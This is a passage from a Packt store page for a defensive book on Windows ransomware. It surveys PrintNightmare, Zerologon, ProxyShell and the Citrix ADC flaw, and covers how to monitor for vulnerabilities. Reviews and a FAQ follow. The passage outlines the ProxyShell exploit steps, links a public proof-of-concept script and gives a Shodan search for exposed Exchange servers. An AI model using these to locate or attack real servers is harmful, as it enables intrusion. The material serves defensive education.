It took Microsoft many weeks before they managed to provide patches and recommendations on how to fix this. In the middle of August, only 1 month later, there were already news articles about ransomware operators that were exploiting the PrintNightmare vulnerability to compromise organizations.

Microsoft provided recommendations when the vulnerability was known, which was to disable the Print Spooler service until they managed to provide a security fix. It also allowed many administrators to realize that the Print Spooler service is not required to run on servers that are not end user facing, such as Citrix/RDS servers.

Important note

A general best practice is to ensure that only required services are running on a service – for example, the Print Spooler service should not be running on a domain controller. This guidance document from Microsoft provides a list of the different services and recommendations for each of them: https://docs.microsoft.com/en-us/windows-server/security/windows-services/security-guidelines-for-disabling-system-services-in-windows-server.

Zerologon

Next, we have Zerologon, another high-severity CVE that exploits a vulnerability in the Netlogon process in Active Directory, which allows an attacker to impersonate any computer, including a domain controller.

To be able to leverage this vulnerability, the attack needed to be able to communicate with the domain controllers, such as having a Windows client that is joined to the Active Directory domain.

Then, the attackers would spoof another domain controller in the infrastructure and use the MS-NRPC protocol to change the password for the machine account in Active Directory, which is as simple as sending a simple TCP frame with the new password:

Figure 1.11 – Zerologon attack process

Figure 1.11 – Zerologon attack process

Once the new password had been accepted, the attackers could then use that new account to start new processes with an Active Directory domain controller context, which was then used to compromise the remaining infrastructure. Zerologon has been used in many ransomware attacks to, through lateral movement, compromise Active Directory and gain access to the domain controllers.

This vulnerability was fixed in a patch from Microsoft in August 2020. In September 2020, the security researchers from Secura who discovered the vulnerability issued their research, and within a week, there were already different proofs of concept published on how you can leverage the exploit. You can find the link to the initial whitepaper on the vulnerability here: https://www.secura.com/uploads/whitepapers/Zerologon.pdf.

In the months after, many organizations were hit by Ruyk, where they used the Zerologon vulnerability. On average, most security researchers state that it takes between 60 and 150 days (about 5 months) for an average organization to install a patch once it has been released by the vendor.

ProxyShell

Then, we have ProxyShell, which is a vulnerability consisting of three different CVEs used as part of a single attack chain that affected Microsoft Exchange 2013/2016/2019, which allowed attackers to do pre-authenticated RCE.

The main vulnerabilities lie in the Client Access Service (CAS) server component in Exchange, which is exposed to the internet by default to allow end users to access email services externally.

In short, the ProxyShell exploit does the following:

  • Sends an Autodiscover request to leak the user's LegacyDN information with a known email address.
  • Sends a MAPI request to the CAS servers to leak the user’s SID using the LegacyDN.
  • Constructs a valid authentication token from the CAS service using the SID and email address.
  • Authenticates to the PowerShell endpoint and executes the code using the authentication token. The example code can be found on GitHub at https://github.com/horizon3ai/proxyshell.

Horizon3.ai released a Python script to showcase how easy it is to exploit this vulnerability (https://github.com/horizon3ai/proxyshell), where you just need to run the script and point it to an Exchange CAS server.

All these vulnerabilities were patched in April 2021, but the information was published publicly in June 2021.

In February 2022, it was discovered that a significant number of organizations had failed to update their Exchange services, even though it was urgently required. More precisely, 4.3% of all Microsoft Exchange services that were publicly accessible were still unpatched for the ProxyShell vulnerability. Out of those that did apply the ProxyShell patch, 16% of organizations did not install the subsequent patches that were released from July 2021 onward, which left them open to attacks. As a result, many organizations had still not fully eliminated the vulnerability, even after six months had passed. As seen in the following Shodan screenshot from February 2022, there were still quite a high amount of public-facing Exchange servers that had the vulnerability present:

Figure 1.12 – Shodan search for vulnerable ProxyShell Exchange servers

Figure 1.12 – Shodan search for vulnerable ProxyShell Exchange servers

Using a free account in Shodan.io, you can search for different applications and/or services and get an overview map of vulnerabilities. In this case, I used the http.component:"outlook web app" search tag.

Citrix ADC (CVE-2019-19781)

Lastly, we have the vulnerability in the Citrix ADC (CVE-2019-19781), which was also a high-severity vulnerability that allowed unauthenticated attackers to write a file to a location on disk. It turned out that by using this vulnerability, you could run RCE on the ADC appliance.

This had multiple implications since an ADC is often a core component in the network to provide load balancing and reverse proxy services for different services. Therefore, it most likely had many network interfaces with access to different zones, and in many cases, had access to usernames/passwords and SSL certificates.

The vulnerability itself was exploiting a directory traversal bug that calls a Perl script, which is used to append files in XML format to the appliance. This is then processed by the underlying operating system. This, in turn, allows for RCE.

This caused a lot of turmoil, with close to 60,000 vulnerable Citrix ADC servers being affected, because the vulnerability was out and Citrix did not have a patch ready. The vulnerability became public at the end of 2019, while Citrix had an expected timeframe of patches being available at the end of January 2020. This vulnerability also affected four major versions of the ADC platform, which also meant that the patch needed to be backported to earlier versions, which affected the timeline of when the patch could be ready.

While Citrix provided a workaround to mitigate the vulnerability, this did not work for all software editions because of licensing issues, with features that were not available.

Eventually, the patch was released and the vulnerability was closed, but many ADC instances were compromised. Many got infected with simple bitcoin mining scripts and others were used to deploy web shells.

One group, which was later referred to as Iran Network Team, created a web shell on each of the ADC appliances that they compromised. The group was pretty successful in deploying a backdoor to a significant number of ADC appliances. Many of these appliances were already patched but were still vulnerable due to the password-less backdoor left open on their devices by the attackers. This web shell could easily be accessed using a simple HTTP POST command.

In addition, another threat actor created a new backdoor named NOTROBIN. Instead of deploying a web shell or bitcoin mining, they would add their own shell with a predefined infection key. In addition, they would attempt to identify and remove any existing backdoors, as well as attempt to block further exploitation of the affected appliances. They did this by deleting new XML files or scripts that did not contain a per-infection secret key. This meant that a compromised ADC appliance was only accessible through the backdoor with the infection key.

Looking back at these vulnerabilities that I’ve covered, many of them were used as part of a ransomware attack. It is important to note the following:

  • The time between when a vulnerability is discovered and an attacker starts exploiting it is becoming shorter and shorter.
  • You should always apply security patches as soon as possible because in many cases, you might not realize the impact of a vulnerability until it is too late.
  • After a vulnerability is known, if it takes too much time to install the patch to remediate it, chances are that someone might have already exploited the vulnerability.
  • Also, in many cases, an attacker might have already been able to exploit the vulnerability to create a backdoor that might still be utilized even after the patch is installed.
  • Many vulnerabilities evolve after the initial publication. This means that after a vulnerability becomes known, many security researchers or attackers can find new ways to use the vulnerability or find vulnerabilities within the same product/feature/service, as was the case with PrintNightmare.
  • The amount of CVEs is increasing year by year: https://www.cvedetails.com/browse-by-date.php.
  • High-severity vulnerabilities are not limited to Windows. This also affects other core components, including firewalls and virtualization platforms such as VMware.
  • Vulnerabilities from a ransomware perspective can be used for both initial access and lateral movement, depending on what kinds of services are affected by the vulnerability.

Now that we have taken a closer look at some of the different attack vectors, such as identity-based attacks, and also looked at some of the vulnerabilities that have been utilized for ransomware attacks, such as PrintNightmare and Zerologon, let’s take a closer look at how to monitor for vulnerabilities.

Monitoring vulnerabilities

There will always be vulnerabilities and bugs, so it is important to pay attention to updates that might impact your environment.

An average business today might have somewhere between 20 and 100 different pieces of software installed within their environment. This might also include software from the same number of vendors. Consider using the following software if you are a small company running an on-premises environment:

  • VMware: Virtualization
  • Fortinet: Firewall
  • HP: Hardware and server infrastructure
  • Citrix: Virtual apps and desktop
  • Microsoft Exchange: Email
  • Microsoft SQL: Database
  • Windows: Clients and servers
  • Chrome: Browser
  • Microsoft Office: Productivity
  • Cisco: Core networking, wireless
  • Adobe: PDF viewer/creator
  • Apache HTTP: Web server

In addition to this, end users have their own applications that they need and there may be other line-of-business applications that you might need as part of your organization. Here, we have already listed over 10 different vendors and many applications/products that need to be patched. How do we maintain control and monitor for vulnerabilities?

This falls into a category called vulnerability management, which is the practice of identifying and remediating software vulnerabilities. Remediating software vulnerabilities is done either through configuration changes or, in most cases, by applying software patches from the vendors. We will go into using tooling to patch infrastructure and services in Chapter 10, Best Practices for Protecting Windows from Ransomware Attacks, but one thing I want to cover is how to monitor vulnerabilities.

While many commercial products can be used, I also tend to use other online data sources, which are listed as follows, and also many sources on social media have been extremely useful.

For example, you can use a centralized RSS feed to monitor security advisories from different vendors. This is the most common tool that I use to monitor vulnerabilities from vendors. Most websites have an RSS feed that I can collect into an RSS reader such as Feedly. Some of the RSS feeds that I use are the following:

In addition to the different software vendors, I also follow the centralized RSS feed from NIST. However, this is not vendor-specific, so often, I use it to correlate information that’s vendor-specific to NIST.

It should be noted that, depending on the different vendors you use, monitoring all these RSS feeds can be a time-consuming and repetitive process. In many cases, you should limit the amount of RSS feeds to a minimum. Some vendors also have good filtering capabilities so that you do not get information about vulnerabilities related to products you do not have. Going through the information from these feeds is something that should be turned into a routine. In larger IT teams, this task should be rotated between multiple people – for instance, you should have someone responsible for going through the information and presenting relevant information on Monday mornings.

While RSS feeds are one way to get this information, I also use some other online sources to monitor the current landscape:

  • Vulmon: This provides an automated way to get alerts and notifications related to vulnerabilities and can be mapped to products. You can get a view of the latest vulnerabilities here: https://vulmon.com/searchpage?q=*&sortby=bydate. In addition, you can use Vulmon as a search engine to find related vulnerabilities and more information.
  • Social media: Twitter can be an extremely useful service for monitoring current threats/vulnerabilities. As an active Twitter user myself, I have some main sources that I follow to stay up to date on current threats/vulnerabilities:
    • vFeed Inc. Vulnerability Intelligence As A Service (@vFeed_IO)
    • Threat Intel Center (@threatintelctr)

There are also products from third-party vendors that can automate this to scan the environment and look at current vulnerabilities, such as services from Qualys and Rapid7, which can be good tools to have in your toolbox when you are mixing a lot of third-party services in a large environment. It should be noted that these products do not have 100% coverage on all products/vendors, so it is still important that you have a mapping of your current application vendors and the services/applications they are providing, as well as ensuring that you are monitoring the status of each application.

Summary

In this chapter, we took a closer look at some of the main attack vectors that ransomware operators are using to get their foot in the door, by either using existing credentials or phishing attacks to lure end users and gain access to a compromised machine.

In most cases, attackers utilize one or multiple vulnerabilities either directly on an end user’s machine or to exploit external services that the organization has available.

We also took a look at some of the extortion tactics attackers use, in addition to other attack vectors, such as DDoS attacks, to pressure organizations into paying the ransom.

Then, we looked closer at some of the more well-known ransomware operators and their modus operandi, as well as some of the more frequently used attack vectors regarding identity and exploiting vulnerabilities and how they have been used in successful attacks.

Finally, we looked into how to monitor vulnerabilities and some of the sources that can be useful assets in your toolbox.

In the next chapter, we will start to look at countermeasures and build a secure foundation for our IT services, as well as adopt a zero-trust-based security architecture.

Left arrow icon Right arrow icon
Download code icon Download Code

Key benefits

  • Learn to build security monitoring solutions based on Microsoft 365 and Sentinel
  • Understand how Zero-Trust access and SASE services can help in mitigating risks
  • Build a secure foundation for Windows endpoints, email, infrastructure, and cloud services

Description

If you’re looking for an effective way to secure your environment against ransomware attacks, this is the book for you. From teaching you how to monitor security threats to establishing countermeasures to protect against ransomware attacks, Windows Ransomware Detection and Protection has it all covered. The book begins by helping you understand how ransomware attacks work, identifying different attack vectors, and showing you how to build a secure network foundation and Windows environment. You’ll then explore ransomware countermeasures in different segments, such as Identity and Access Management, networking, Endpoint Manager, cloud, and infrastructure, and learn how to protect against attacks. As you move forward, you’ll get to grips with the forensics involved in making important considerations when your system is attacked or compromised with ransomware, the steps you should follow, and how you can monitor the threat landscape for future threats by exploring different online data sources and building processes. By the end of this ransomware book, you’ll have learned how configuration settings and scripts can be used to protect Windows from ransomware attacks with 50 tips on security settings to secure your Windows workload.

Who is this book for?

This book is for Windows administrators, cloud administrators, CISOs, and blue team members looking to understand the ransomware problem, how attackers execute intrusions, and how you can use the techniques to counteract attacks. Security administrators who want more insights into how they can secure their environment will also find this book useful. Basic Windows and cloud experience is needed to understand the concepts in this book.

What you will learn

  • Understand how ransomware has evolved into a larger threat
  • Secure identity-based access using services like multifactor authentication
  • Enrich data with threat intelligence and other external data sources
  • Protect devices with Microsoft Defender and Network Protection
  • Find out how to secure users in Active Directory and Azure Active Directory
  • Secure your Windows endpoints using Endpoint Manager
  • Design network architecture in Azure to reduce the risk of lateral movement

Product Details

Country selected
Publication date, Length, Edition, Language, ISBN-13
Publication date : Mar 17, 2023
Length: 290 pages
Edition : 1st
Language : English
ISBN-13 : 9781803246345
Category :
Languages :
Concepts :
Tools :

What do you get with a Packt Subscription?

Free for first 7 days. $19.99 p/m after that. Cancel any time!
Product feature icon Unlimited ad-free access to the largest independent learning library in tech. Access this title and thousands more!
Product feature icon 50+ new titles added per month, including many first-to-market concepts and exclusive early access to books as they are being written.
Product feature icon Innovative learning tools, including AI book assistants, code context explainers, and text-to-speech.
Product feature icon Thousands of reference materials covering every tech concept you need to stay up to date.
Subscribe now
View plans & pricing

Product Details

Publication date : Mar 17, 2023
Length: 290 pages
Edition : 1st
Language : English
ISBN-13 : 9781803246345
Category :
Languages :
Concepts :
Tools :

Packt Subscriptions

See our plans and pricing
Modal Close icon
$19.99 billed monthly
Feature tick icon Unlimited access to Packt's library of 7,000+ practical books and videos
Feature tick icon Constantly refreshed with 50+ new titles a month
Feature tick icon Exclusive Early access to books as they're written
Feature tick icon Solve problems while you work with advanced search and reference features
Feature tick icon Offline reading on the mobile app
Feature tick icon Simple pricing, no contract
$199.99 billed annually
Feature tick icon Unlimited access to Packt's library of 7,000+ practical books and videos
Feature tick icon Constantly refreshed with 50+ new titles a month
Feature tick icon Exclusive Early access to books as they're written
Feature tick icon Solve problems while you work with advanced search and reference features
Feature tick icon Offline reading on the mobile app
Feature tick icon Choose a DRM-free eBook or Video every month to keep
Feature tick icon PLUS own as many other DRM-free eBooks or Videos as you like for just $5 each
Feature tick icon Exclusive print discounts
$279.99 billed in 18 months
Feature tick icon Unlimited access to Packt's library of 7,000+ practical books and videos
Feature tick icon Constantly refreshed with 50+ new titles a month
Feature tick icon Exclusive Early access to books as they're written
Feature tick icon Solve problems while you work with advanced search and reference features
Feature tick icon Offline reading on the mobile app
Feature tick icon Choose a DRM-free eBook or Video every month to keep
Feature tick icon PLUS own as many other DRM-free eBooks or Videos as you like for just $5 each
Feature tick icon Exclusive print discounts

Frequently bought together


Stars icon
Total $ 119.96 154.97 35.01 saved
Effective Threat Investigation for SOC Analysts
$37.99 $54.99
Practical Threat Detection Engineering
$41.98 $59.99
Windows Ransomware Detection and Protection
$39.99
Total $ 119.96 154.97 35.01 saved Stars icon
Banner background image

Table of Contents

15 Chapters
Part 1:Ransomware Basics Chevron down icon Chevron up icon
Chapter 1: Ransomware Attack Vectors and the Threat Landscape Chevron down icon Chevron up icon
Chapter 2: Building a Secure Foundation Chevron down icon Chevron up icon
Part 2:Protect and Detect Chevron down icon Chevron up icon
Chapter 3: Security Monitoring Using Microsoft Sentinel and Defender Chevron down icon Chevron up icon
Chapter 4: Ransomware Countermeasures – Windows Endpoints, Identity, and SaaS Chevron down icon Chevron up icon
Chapter 5: Ransomware Countermeasures – Microsoft Azure Workloads Chevron down icon Chevron up icon
Chapter 6: Ransomware Countermeasures – Networking and Zero-Trust Access Chevron down icon Chevron up icon
Chapter 7: Protecting Information Using Azure Information Protection and Data Protection Chevron down icon Chevron up icon
Part 3:Assume Breach Chevron down icon Chevron up icon
Chapter 8: Ransomware Forensics Chevron down icon Chevron up icon
Chapter 9: Monitoring the Threat Landscape Chevron down icon Chevron up icon
Chapter 10: Best Practices for Protecting Windows from Ransomware Attacks Chevron down icon Chevron up icon
Index Chevron down icon Chevron up icon
Other Books You May Enjoy Chevron down icon Chevron up icon

Customer reviews

Rating distribution
Full star icon Full star icon Full star icon Full star icon Half star icon 4.8
(5 Ratings)
5 star 80%
4 star 20%
3 star 0%
2 star 0%
1 star 0%
Jay Mehta Jun 22, 2023
Full star icon Full star icon Full star icon Full star icon Full star icon 5
I must say, I came across a book that truly resonated with me. The author's writing style was so captivating that I found it hard to put the book down. The information and pragmatic approach provided in this book regarding Ransomware Detection and Protection would be certainly helpful to all Cyber Security analysts, engineers, architects, Offensive Security operators, or SOC analysts. Indeed, all chapters are very well organized and covered almost all aspects related to Ransomware In short, I firmly believe that this book is a must-read for anyone who wants to pursue a career in Cyber Security domain or keen interest in securing data. I highly recommend it!
Amazon Verified review Amazon
Tomica Kaniski Jun 08, 2023
Full star icon Full star icon Full star icon Full star icon Full star icon 5
I really liked the book as it's not too long, but packed with information about ransomware, and tips to ensure a solid, secure foundation in terms of covering all the essential technologies and services which will help you in battling not only ransomware, but also everything else. It's nice to see all the info gathered in this clear and not too long format - of course, for anyone needing more information about things covered like ransomware protection best practices, Microsoft Defender family, identity protection, monitoring, etc. many Internet sources cover it. For me, this list of essential things you know you should pay attention to, but can't really remember all when needed, in one place, makes this book a great read!
Amazon Verified review Amazon
Chip L. Jun 27, 2023
Full star icon Full star icon Full star icon Full star icon Full star icon 5
I started reading this just because I was interested in learning more about Sentinel and as I was reading a former co-worker reached out to me about a cyber attack at his employer. I gave him some information out of the book and he decided to buy it. This book helped him out on navigating a ransomware attack. The style the author uses is easy to read and follow. You can pick this up with zero knowledge and get up to speed quickly or if you are a hardened sys admin, you'll still find something here to learn.
Amazon Verified review Amazon
GUNDERSTONE Jun 17, 2023
Full star icon Full star icon Full star icon Full star icon Full star icon 5
This all-inclusive guide aims to provide you with the necessary knowledge and resources to effectively secure your Windows endpoints, cloud, and infrastructure against the ever-growing threat of ransomware attacks. The book delves into the core components of Windows technologies and provides valuable insights on utilizing Microsoft Intune, Sentinel, and Defender to detect and protect against ransomware. Whether you are a system administrator, IT professional, or interested in enhancing your cybersecurity skills, this book offers practical guidance, best practices, and real-world examples to help safeguard your Windows systems from malicious threats. Get ready to fortify your defenses and gain the confidence to combat ransomware with the help of this invaluable resource.Author Marius Sandbu is a cloud evangelist and architect with over 17 years of experience in the IT industry, currently working at Sopra Steria in Norway. The author has a broad range of technical expertise in identity, networking, virtualization, endpoint management, and infrastructure, particularly emphasizing the public cloud. Marius is a prolific blogger, co-host of the CloudFirst podcast, and an international speaker at events like Microsoft Ignite and Citrix Synergy. He formerly served as the technical lead for the public cloud unit at Tietoevry and worked as a system administrator at the University of Oslo.In an increasingly digital world, the threat of ransomware attacks looms large, posing significant risks to individuals and organizations alike. To combat this growing menace, "Windows Ransomware Detection and Protection" offers a comprehensive guide that equips readers with the knowledge and tools to secure their Windows endpoints, cloud, and infrastructure effectively. Authored by experts in the field, this book provides a deep dive into the complexities of ransomware attacks, explores various defense strategies, and offers implementable takeaways that can be immediately applied to enhance cybersecurity measures.Chapter Summaries:Chapter 1: Ransomware Attack Vectors and the Threat Landscape.In this chapter, the conversation focuses on the fundamentals of ransomware, exploring its origins, characteristics, and the devastating impact it can have on businesses and individuals. The various types of ransomware are discussed, including file-encrypting ransomware and locker ransomware, and highlight real-world examples to illustrate the severity of the threat.Chapter 2: Building a Secure Foundation.This chapter concentrates on high-level design and security best practices. The critical components of constructing a security monitoring platform are closely examined. Building a secure foundation in Microsoft Azure using Microsoft reference architectures to safeguard your services and data is also reviewed.While many ransomware attacks originate from phishing attacks targeting end users, others begin with hackers exploiting vulnerabilities or conducting brute-force attacks on external services, then moving through the network by exploiting gaps they discover. There have also been instances where attackers use fake or Trojanized applications to gain access through backdoors or as part of a supply chain attack.If your company is considering migrating to the cloud, it is essential to establish a secure foundation that incorporates best practices from cloud platform vendors and meets your current needs. This chapter reviews the following topics: Zero-trust design principles for a secure foundation, Building secure network access, Managing identity and access control, Fundamentals of security logging and monitoring, and Key components of constructing a secure foundation in Microsoft Azure.Chapter 3: Security Monitoring Using Microsoft Sentinel and Defender.As organizations increasingly adopt cloud computing, addressing the unique security challenges ransomware poses in cloud environments is essential. In this chapter, the discussion focuses on utilizing tools such as Microsoft Sentinel, Microsoft Defender for Endpoint, and Microsoft Defender for Servers to detect abnormal activities within environments. The chapter continues by examining how these services operate and how to use them effectively, focusing on the capabilities of Microsoft Defender for vulnerability management. The topics include an overview of Microsoft Sentinel and Microsoft Defender, designing and implementing Microsoft Sentinel, using Kusto to query data logs, creating analytics rules in Sentinel, and monitoring vulnerabilities with Microsoft Defender.Chapter 4: Ransomware Countermeasures – Windows Endpoints, Identity, and SaaS.Ransomware attacks often exploit vulnerabilities in network infrastructure to propagate and spread across an organization's systems. In this chapter, the content goes deeper into various countermeasures that can help reduce the risk of ransomware attacks on critical attack vectors, including endpoints, identity, email services, and network attacks. Topics reviewed include: securing Windows endpoints with Microsoft Intune and Azure AD endpoints, implementing attack surface reduction rules and browser protection mechanisms such as SmartScreen and Application Guard, safeguarding user identities in Azure AD and SaaS services, improving email security in Office 365 to reduce the risk of phishing attacks and additional tips and tricks for securing Windows endpoint.Chapter 5: Ransomware Countermeasures – Microsoft Azure WorkloadsDespite the best preventive measures, organizations may still fall victim to ransomware attacks. As more organizations migrate their virtual machine workloads to the cloud, it is crucial to understand the various security mechanisms and the appropriate architecture before deploying infrastructure. In most cases, individuals and organizations that have fallen victim to ransomware or had information exposed after moving their workloads to the public cloud were due to a lack of knowledge or inadequate security measures.This chapter explores the theory behind constructing a secure architecture in Microsoft Azure for virtual machine workloads. It covers the following additional topics: network segmentation and design best practices in Microsoft Azure, protecting external services with DDoS and WAF mechanisms, security best practices for Identity and Access Management in Azure, safeguarding hybrid workloads with Azure Arc, identity and access management in Microsoft Azure, and data protection using Azure Backup and Azure Policy.Chapter 6: Ransomware Countermeasures – Networking and Zero-Trust Access.Most ransomware attacks originate from a compromised device or an externally available vulnerable service, such as a VPN or VDI, which attackers exploit. These attacks typically provide the attacker with an initial foothold, allowing them to gain further access to the infrastructure. Many of these attacks can be prevented if the end-user device does not have access to the infrastructure or the service is not externally available.This chapter reviews alternatives for securely accessing services externally using a zero-trust-based access model without exposing ourselves to the same risks. It also examines best practices for network segmentation and security for Windows-based workloads and methods for protecting our external web services from Distributed Denial-of-Service (DDoS) attacks, an increasingly common attack vector. Additionally, the chapter reviews SASE service models and how they can help reduce the risk to the mobile workforce.The topics covered include zero-trust network access and SASE services, network segmentation, firewalls, access control, and DDoS protection and security for new web services."Chapter 7: Protecting Information Using Azure Information Protection and Data ProtectionIn recent years, ransomware attacks have evolved from simply encrypting data to exfiltrating it because many companies realized they could restore encrypted files from backups, negating the need to pay the ransom. To increase the likelihood of receiving payment, ransomware groups have begun exfiltrating any data they can find.In this book chapter, the author explores how to use services to encrypt data and lower the probability that it falls into the wrong hands. Built-in Windows and Azure Information Protection (AIP) services are reviewed and shared best data protection and backup practices are discussed. The topics include the importance of classifying and encrypting your data, an overview of AIP, DLP features and the future of AIP, encrypting SQL-based workloads, and best practices for data protection and backups.Chapter 8: Ransomware ForensicsNo matter how many countermeasures are implemented or how advanced the security measures are, it is impossible to be wholly protected from cyberattacks. As such, it is crucial to know how to respond in the event of an attack and to conduct a post-incident review to determine how the attack occurred. Many corporations that have fallen victim to ransomware and paid the ransom have been attacked again just weeks later because they failed to address the vulnerability or implement appropriate countermeasures.This chapter covers conducting ransomware forensics and responding to an attack, examining the filesystem, registry, and events from your infrastructure, identifying the type of ransomware and common attack vectors, and removing the entry point used by the attackers after restoring your systems.Chapter 9: Monitoring the Threat LandscapeThe threat landscape is constantly changing, making it essential for IT professionals to have access to tools and news sources that enable them to stay informed about current threats. This chapter offers advice on monitoring the threat landscape for emerging threats using various online sources and processes to stay up-to-date.The chapter also discusses trends observed in the past year and critical factors for protecting workloads against future threats. The topics covered include monitoring the threat landscape, implementing processes to manage threats, and predicting future developments in the threat landscape.Chapter 10: Best Practices for Protecting Windows from Ransomware AttacksThe book's final chapter focuses on configuration settings and scripts that can help protect Windows from ransomware attacks. The material covered delves into specific security policies, baseline settings, and other best practices. Topics discussed include best practices and security settings for Windows, managing remote desktops, and administrative shares, using the Windows Firewall and LAPS, automatically patching infrastructure, utilizing the File Server Resource Manager, and additional tips for reducing the risk of ransomware attacks.Implementable Takeaways from "Windows Ransomware Detection and Protection" PDF:1. Stay Informed: Keep yourself updated on the latest trends and techniques ransomware attackers use. Regularly monitor security news, attend webinars, and participate in relevant forums to stay ahead of emerging threats.2. Educate and Train Employees: Ransomware attacks often exploit human vulnerabilities, such as phishing emails or social engineering tactics. Establish extensive security awareness training programs to inform employees about potential threats and best practices for recognizing and avoiding them.3. Implement Multi-Layered Security: Relying on a single security solution is insufficient to protect against ransomware. Implement a multi-layered security approach that includes robust endpoint protection, network security measures, and cloud security controls. Regularly update and patch all software and systems to address known vulnerabilities.4. Backup and Disaster Recovery: Regularly back up critical data and ensure backups are stored securely and offline. Test the restoration process periodically to ensure data integrity and availability during a ransomware attack. Consider implementing a disaster recovery plan to minimize downtime and ensure business continuity.5. Implement Least Privilege Access: Limit user privileges to only what is necessary for their roles. Implement the principle of least privilege to minimize the potential impact of a ransomware attack. Regularly review and revoke unnecessary privileges to reduce the attack surface.6. Monitor and Detect: Implement robust real-time monitoring and detection mechanisms to identify potential ransomware attacks. To promptly detect and respond to suspicious activities, utilize security tools such as intrusion detection systems, endpoint detection, response solutions, and security information and event management (SIEM) systems.7. Develop an Incident Response Plan: Develop a detailed incident response plan that specifies the actions to be taken during a ransomware attack. Define roles and responsibilities, establish communication channels, and conduct regular drills to ensure a swift and coordinated response.8. Engage in Threat Intelligence Sharing: Collaborate with industry peers, security vendors, and relevant communities to share threat intelligence and stay updated on the latest ransomware trends. Participate in information-sharing platforms and leverage threat intelligence feeds to enhance your organization's defenses.9. Regularly Test and Update Security Measures: Conduct regular security assessments, penetration testing, and vulnerability scanning to identify and address any weaknesses in your security infrastructure. Keeping all software and systems current with the most recent security patches and updates is essential.10. Continuous Improvement: Regularly assess and update your security measures. Conduct security assessments, penetration testing, and vulnerability scanning to identify and address any weaknesses in your security infrastructure. Regularly installing security patches and updates is essential to keep all software and systems current.
Amazon Verified review Amazon
Agustin Jul 14, 2023
Full star icon Full star icon Full star icon Full star icon Empty star icon 4
Super detailed book focusingon how to protect windows systems from attacks and ransomware focusing on Microsost security and IR tools and the Azure Cloud environment
Amazon Verified review Amazon
Get free access to Packt library with over 7500+ books and video courses for 7 days!
Start Free Trial

FAQs

What is included in a Packt subscription? Chevron down icon Chevron up icon

A subscription provides you with full access to view all Packt and licnesed content online, this includes exclusive access to Early Access titles. Depending on the tier chosen you can also earn credits and discounts to use for owning content

How can I cancel my subscription? Chevron down icon Chevron up icon

To cancel your subscription with us simply go to the account page - found in the top right of the page or at https://subscription.packtpub.com/my-account/subscription - From here you will see the ‘cancel subscription’ button in the grey box with your subscription information in.

What are credits? Chevron down icon Chevron up icon

Credits can be earned from reading 40 section of any title within the payment cycle - a month starting from the day of subscription payment. You also earn a Credit every month if you subscribe to our annual or 18 month plans. Credits can be used to buy books DRM free, the same way that you would pay for a book. Your credits can be found in the subscription homepage - subscription.packtpub.com - clicking on ‘the my’ library dropdown and selecting ‘credits’.

What happens if an Early Access Course is cancelled? Chevron down icon Chevron up icon

Projects are rarely cancelled, but sometimes it's unavoidable. If an Early Access course is cancelled or excessively delayed, you can exchange your purchase for another course. For further details, please contact us here.

Where can I send feedback about an Early Access title? Chevron down icon Chevron up icon

If you have any feedback about the product you're reading, or Early Access in general, then please fill out a contact form here and we'll make sure the feedback gets to the right team. 

Can I download the code files for Early Access titles? Chevron down icon Chevron up icon

We try to ensure that all books in Early Access have code available to use, download, and fork on GitHub. This helps us be more agile in the development of the book, and helps keep the often changing code base of new versions and new technologies as up to date as possible. Unfortunately, however, there will be rare cases when it is not possible for us to have downloadable code samples available until publication.

When we publish the book, the code files will also be available to download from the Packt website.

How accurate is the publication date? Chevron down icon Chevron up icon

The publication date is as accurate as we can be at any point in the project. Unfortunately, delays can happen. Often those delays are out of our control, such as changes to the technology code base or delays in the tech release. We do our best to give you an accurate estimate of the publication date at any given time, and as more chapters are delivered, the more accurate the delivery date will become.

How will I know when new chapters are ready? Chevron down icon Chevron up icon

We'll let you know every time there has been an update to a course that you've bought in Early Access. You'll get an email to let you know there has been a new chapter, or a change to a previous chapter. The new chapters are automatically added to your account, so you can also check back there any time you're ready and download or read them online.

I am a Packt subscriber, do I get Early Access? Chevron down icon Chevron up icon

Yes, all Early Access content is fully available through your subscription. You will need to have a paid for or active trial subscription in order to access all titles.

How is Early Access delivered? Chevron down icon Chevron up icon

Early Access is currently only available as a PDF or through our online reader. As we make changes or add new chapters, the files in your Packt account will be updated so you can download them again or view them online immediately.

How do I buy Early Access content? Chevron down icon Chevron up icon

Early Access is a way of us getting our content to you quicker, but the method of buying the Early Access course is still the same. Just find the course you want to buy, go through the check-out steps, and you’ll get a confirmation email from us with information and a link to the relevant Early Access courses.

What is Early Access? Chevron down icon Chevron up icon

Keeping up to date with the latest technology is difficult; new versions, new frameworks, new techniques. This feature gives you a head-start to our content, as it's being created. With Early Access you'll receive each chapter as it's written, and get regular updates throughout the product's development, as well as the final course as soon as it's ready.We created Early Access as a means of giving you the information you need, as soon as it's available. As we go through the process of developing a course, 99% of it can be ready but we can't publish until that last 1% falls in to place. Early Access helps to unlock the potential of our content early, to help you start your learning when you need it most. You not only get access to every chapter as it's delivered, edited, and updated, but you'll also get the finalized, DRM-free product to download in any format you want when it's published. As a member of Packt, you'll also be eligible for our exclusive offers, including a free course every day, and discounts on new and popular titles.